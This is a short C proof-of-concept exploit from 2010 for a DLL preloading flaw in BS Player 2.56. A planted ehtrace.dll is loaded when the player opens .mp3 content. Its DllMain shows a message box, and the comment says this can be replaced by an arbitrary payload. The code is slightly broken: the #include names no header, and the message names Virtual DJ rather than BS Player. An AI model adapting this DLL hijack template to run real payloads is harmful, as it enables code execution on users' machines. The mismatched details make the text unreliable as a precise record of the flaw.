/* Description: BS Player 2.56 vulnerable for another DLL Preloading on ehtrace.dll while loading .mp3 content. Date: August 29, 2010 Author: Classity Security Scans PoC: Displaying message box, but can be replaced by DLL with arbitrary payload. */ #include #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_pl(); return 0; } int dll_pl() { MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK); return 0; }